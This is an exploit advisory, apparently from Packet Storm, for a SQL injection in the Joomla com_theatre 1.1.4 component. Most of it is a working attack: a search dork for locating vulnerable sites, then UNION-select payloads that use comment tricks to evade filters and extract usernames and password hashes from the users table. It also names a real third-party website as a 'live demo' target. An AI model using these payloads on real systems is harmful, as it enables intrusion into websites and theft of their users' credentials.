Joomla Threate 1.1.4 SQL Injection

2016-07-10T00:00:00
ID PACKETSTORM:137843
Type packetstorm
Reporter xBADGIRL21
Modified 2016-07-10T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Joomla com_threate 1.1.4 SQL injection  
# Exploit Author : xBADGIRL21  
# Dork : index.php?option=com_threate  
# version: 1.1.4  
# Vendor Homepage : http://joomlic.com/  
# Tested on: [ Windows ]  
# skype:xbadgirl21  
# Date: 2016/07/09  
# video Proof : https://youtu.be/WXqrK7dqGaY  
######################  
# PoC:  
# [id=] Get Parameter Vulnerable To SQL  
#  
# http://server/index.php?option=com_theatre&view=show&id=[SQLi]  
#  
# Demo  
# http://server/index.php?option=com_theatre&view=show&id=36'  
#  
# http://server/index.php?option=com_theatre&view=show&id=-36  
/*!12345union*/ select  
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43  
#  
# http://server/index.php?option=com_theatre&view=show&id=-36  
/*!12345union*/ select  
1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43  
from aur_users--  
#  
# Live Demo :  
# https://www.auroratheatre.org/  
#  
######################  
# Discovered by : xBADGIRL21  
# Greetz : All Mauritanien Hackers - NoWhere  
#######################  
`